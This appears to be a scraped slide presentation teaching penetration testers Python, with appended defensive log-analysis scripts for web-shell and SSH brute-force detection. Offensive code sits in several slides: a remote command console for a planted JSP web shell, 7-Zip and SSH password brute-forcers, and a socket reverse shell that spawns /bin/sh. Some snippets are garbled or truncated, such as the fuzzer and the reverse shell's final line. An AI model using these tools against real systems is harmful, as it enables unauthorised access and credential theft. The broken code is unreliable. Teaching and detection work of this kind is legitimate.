Python for Penetration testers
Quick presentation on how a penetration tester can start using Python to automate many tasks, create new tools, etc. For my colleagues.


Published in: Technology

1 Comment
  • Thank you man, this PDF helped me to perfect my Python code!
  • 1. Why?
      - EASY (install, learn, code)
      - Tons of libraries
      - Code is easy to understand
      - Multiplatform
      - Good for prototyping
  • 2. History
      - Conceived in the late 80s, with the first implementation in 1989
      - Created by Guido van Rossum
      - Benevolent Dictator for Life
      - Currently there are two branches: 2.x and 3.0
  • 3. Python 101
      - Interpreted language
      - Object oriented
      - Indentation is significant in Python: it is the block delimiter
      - Usual control structures (if, while, etc.)
      - Multiple levels of organization (functions, classes, modules, packages)
  • 4. Who is using Python?
      - Core Impact
      - Immunity Debugger
      - Canvas
      - Peach
      - W3AF
      - Sulley
      - Sqlmap
      - Paimei
      - Impacket
      - Scapy
      - Google
      - Spike Proxy
  • 5. Python 101: Data types
      - Strings: "Hello"
      - Numbers: 123
      - Lists: ['hello', '2', '1']
      - Tuples: ('1', '2', '3') (immutable)
      - Dictionaries: d = {'key1': 'dog', 'key2': 'cat'}
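  • 6. Python 101: Structures
        numbers = [1, 2, 3, 4, 5]
        for x in numbers:
            print x

        # x still holds the last list element here;
        # str() is needed to concatenate a number to a string
        if 3 > x:
            print "3 is bigger than " + str(x)
        else:
            print "3 is smaller than " + str(x)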
  • 7. Python 101: Example
      - Hello World:
        print "Hello World"
      - With variables:
        msg = "Hello World"
        print msg
  • 8. Python 101
      - Interactive Python shell
      - Commands execute line by line as you type
      - Good for testing small pieces of code such as loops, regexes, etc.
      - Type "python" and press Enter to access the shell
  • 9. Python 101
      - String indexes start at 0 and can also be negative
      - msg[0] is H
      - msg[-1] is d
  • 10. Basic Code bits
        import sys

        ofile = "names.txt"
        fil = open(ofile, 'r')   # open for reading; 'w' would truncate the file
        x = fil.readlines()
        for y in x:
            print y
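  • 11. Urllib2
      - Library to deal with HTTP
        import urllib2

        url = "http://example.com/"   # placeholder: the slide's URL was lost in extraction
        response = urllib2.urlopen(url)
        html = response.read()
        print html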
  • 12. Basic fuzzer
        import sys, urllib2
        ofile = "dirs.txt"
        fil = open(ofile, 'r')   # open for reading; 'w' would truncate the file
        dirs = fil.readlines()
        for x in dirs:
            response = urllib2.urlopen('+x)
            html =
  • 13. Encoding
        import base64
        string = "TEST"
        base64.standard_b64encode(string)
        # VEVTVA==

        import hashlib
        m = hashlib.new('md5')   # the 32-hex-digit output below is an MD5 digest
        m.update(string)
        res = m.hexdigest()
        print res
        # 033bd94b1168d7e4f0d644c3c95e35bf
  • 14. Generic Console for Web Remote Execution
        import httplib, urllib, sys
        host = "XXXXXXXXXX"
        while 1:
            cmd = raw_input("Exploited@" + host + "#>")
            if cmd == "exit":
                sys.exit()
            else:
                h = httplib.HTTP(host)
                cmd = urllib.quote(cmd)
                print cmd
                h.putrequest("GET", "/myconsole123/my-shell.jsp?pass=1231&cmd=" + cmd)
                h.putheader("Host", host)
                h.putheader("User-agent", "Internet Explorer 6.0")
                h.endheaders()
                returncode, returnmsg, headers = h.getreply()
  • 15. 7 Zip Cracker
        import os, sys, pylzma
        from py7zlib import Archive7z, NoPasswordGivenError, WrongPasswordError
        pas = open("passwords.txt", "rb")
        password = pas.readlines()
        for x in password:
            try:
                fp = open("test.7z", "rb")
                archive = Archive7z(fp, password=x)
                print "The password is" + x
                sys.exit()
            except Exception, e:
                fp.close()
  • 16. A Web browser
        #!/usr/bin/env python
        import sys
        from PyQt4.QtCore import *
        from PyQt4.QtGui import *
        from PyQt4.QtWebKit import *

        app = QApplication(sys.argv)
        web = QWebView()
        web.load(QUrl(""))
        web.show()   # without show() the view is never displayed
        sys.exit(app.exec_())
  • 17. One line Webserver
        python -m SimpleHTTPServer 8080
  • 18. SSH Bruteforcer
        t = paramiko.Transport(hostname)
        try:
            t.start_client()
        except Exception:
            x = 0
        try:
            t.auth_password(username=username, password=passw)
        except Exception:
            x = 0
        if t.is_authenticated():
            print "Password found " + passw
  • 19. Proxy Strike Deflate Patch
      - Pd contains the POST DATA in the repeat function:
        import zlib
        defla = zlib.compress(pd)
  • 20. Reverse Shell
        import socket,subprocess,os
        s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
        s.connect(("",1234))
        os.dup2(s.fileno(),0)
        os.dup2(s.fileno(),1)
        os.dup2(s.fileno(),2)
        ["/bin/sh","-i"])
  • 21. Win32Com
      - Library that allows us to access COM objects on Win32 systems
      - We can automate Word, Excel, PowerPoint, access WMI, AD, etc.
  • 22. Massive printing
        from win32com import client
        import time

        word = client.Dispatch("Word.Application")

        def printPDFDocument(filename):
            word.Documents.Open(filename)
            word.ActiveDocument.PrintOut()
            time.sleep(5)
            word.ActiveDocument.Close()
            word.Quit()

        printPDFDocument("c:test.doc")
  • 23. Excel Processing
        from win32com.client import Dispatch

        xlApp = Dispatch("Excel.Application")
        xlApp.Visible = 1
        xlApp.Workbooks.Open("test.xls")
        # print column 5 of rows 1..99 of the active sheet
        for x in range(1, 100):
            nombre = str(xlApp.ActiveSheet.Cells(x, 5))
            print nombre
        xlApp.Quit()
  • 24. WMI
        import wmi

        c = wmi.WMI()
        for process in c.Win32_Process():
            print process.ProcessId, process.Name
  • 25. Interesting stuff
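
The console on slide 14 leaves a recognisable trace in the web server's access log: a GET to a server-side script carrying a command parameter, sent with a hand-typed User-agent. The following is an added example, not part of the original slides, written for Python 3; the parameter-name list, the function name and the sample log lines are assumptions constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Combined Log Format: ip - user [time] "METHOD target PROTO" status size "referer" "user-agent"
LOG_RE = re.compile(
    r'(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+ "[^"]*" "(?P<ua>[^"]*)"'
)
SCRIPT_EXT = (".jsp", ".jspx", ".php", ".asp", ".aspx")
EXEC_PARAMS = {"cmd", "command", "exec"}   # assumed parameter names, tune per site

def find_webshell_requests(lines):
    """Return (ip, path, decoded_command, reasons) for requests that look like
    command execution through a server-side script."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        url = urlsplit(m.group("target"))
        if not url.path.lower().endswith(SCRIPT_EXT):
            continue
        params = parse_qs(url.query)   # parse_qs also URL-decodes the values
        cmds = [v for k in params if k.lower() in EXEC_PARAMS for v in params[k]]
        if not cmds:
            continue
        reasons = ["exec-parameter"]
        # Browsers send "Mozilla/..."; a bare product name is a weak extra signal
        if not m.group("ua").startswith("Mozilla/"):
            reasons.append("non-browser-user-agent")
        if m.group("status") == "200":
            reasons.append("served-200")
        hits.append((m.group("ip"), url.path, cmds[0], reasons))
    return hits

# Constructed sample log lines (not taken from any real system)
SAMPLE_LOG = [
    '198.51.100.7 - - [10/Oct/2013:13:55:36 +0000] "GET /index.jsp?page=2 HTTP/1.1" 200 5120 "-" "Mozilla/5.0 (X11; Linux x86_64)"',
    '203.0.113.9 - - [10/Oct/2013:13:56:01 +0000] "GET /myconsole123/my-shell.jsp?pass=1231&cmd=uname%20-a HTTP/1.0" 200 184 "-" "Internet Explorer 6.0"',
    '203.0.113.9 - - [10/Oct/2013:13:56:09 +0000] "GET /myconsole123/my-shell.jsp?pass=1231&cmd=whoami HTTP/1.0" 200 54 "-" "Internet Explorer 6.0"',
    '198.51.100.7 - - [10/Oct/2013:13:57:12 +0000] "GET /search.php?q=cmd HTTP/1.1" 200 900 "-" "Mozilla/5.0 (Windows NT 6.1)"',
]

if __name__ == "__main__":
    for hit in find_webshell_requests(SAMPLE_LOG):
        print(hit)
```

Only GET query strings are inspected here; commands sent in a POST body do not appear in a standard access log and need request-body logging or a WAF to see.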
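
Password guessing of the kind shown on slide 18 shows up on the target as a burst of sshd "Failed password" lines from one source. The following is an added example, not part of the original slides, written for Python 3: a sliding-window detector over OpenSSH syslog lines that also flags a successful login following a burst. The threshold, window, assumed year, function name and sample log lines are all assumptions constructed for illustration.

```python
import re
from collections import defaultdict, deque
from datetime import datetime, timedelta

# OpenSSH password-auth result lines as written to syslog
SSHD_RE = re.compile(
    r"^(?P<ts>\w{3}\s+\d+ \d\d:\d\d:\d\d) \S+ sshd\[\d+\]: "
    r"(?P<result>Failed|Accepted) password for (?:invalid user )?(?P<user>\S+) "
    r"from (?P<ip>\S+) port \d+"
)

def detect_password_guessing(lines, threshold=5, window=timedelta(seconds=60), year=2013):
    """Report sources with >= threshold failed passwords inside a sliding window.

    Returns {ip: {"peak": int, "users": set, "login_after_burst": user or None}}.
    """
    recent = defaultdict(deque)   # ip -> failure timestamps still inside the window
    tried = defaultdict(set)      # ip -> every account name it failed against
    alerts = {}
    for line in lines:
        m = SSHD_RE.match(line)
        if not m:
            continue
        # syslog timestamps carry no year, so the caller supplies one (assumption)
        ts = datetime.strptime(f"{year} {m.group('ts')}", "%Y %b %d %H:%M:%S")
        ip, user = m.group("ip"), m.group("user")
        if m.group("result") == "Failed":
            q = recent[ip]
            q.append(ts)
            tried[ip].add(user)
            while ts - q[0] > window:      # drop failures older than the window
                q.popleft()
            if len(q) >= threshold:
                alert = alerts.setdefault(
                    ip, {"peak": 0, "users": tried[ip], "login_after_burst": None})
                alert["peak"] = max(alert["peak"], len(q))
        elif ip in alerts:
            # a success from a source that already tripped the threshold: triage first
            alerts[ip]["login_after_burst"] = user
    return alerts

# Constructed sample lines (hostname, PIDs and addresses are made up)
SAMPLE_LOG = [
    f"Oct 10 13:55:{s:02d} bastion sshd[21{s:02d}]: Failed password for root from 203.0.113.9 port 400{s:02d} ssh2"
    for s in range(1, 11, 2)
] + [
    "Oct 10 13:55:12 bastion sshd[2112]: Accepted password for root from 203.0.113.9 port 40012 ssh2",
    "Oct 10 13:58:00 bastion sshd[2200]: Failed password for invalid user bob from 198.51.100.7 port 51000 ssh2",
    "Oct 10 14:20:00 bastion sshd[2300]: Accepted password for alice from 198.51.100.7 port 51010 ssh2",
]
```

A per-source window misses guessing that is spread across many addresses; counting failures per target account with the same structure covers that case.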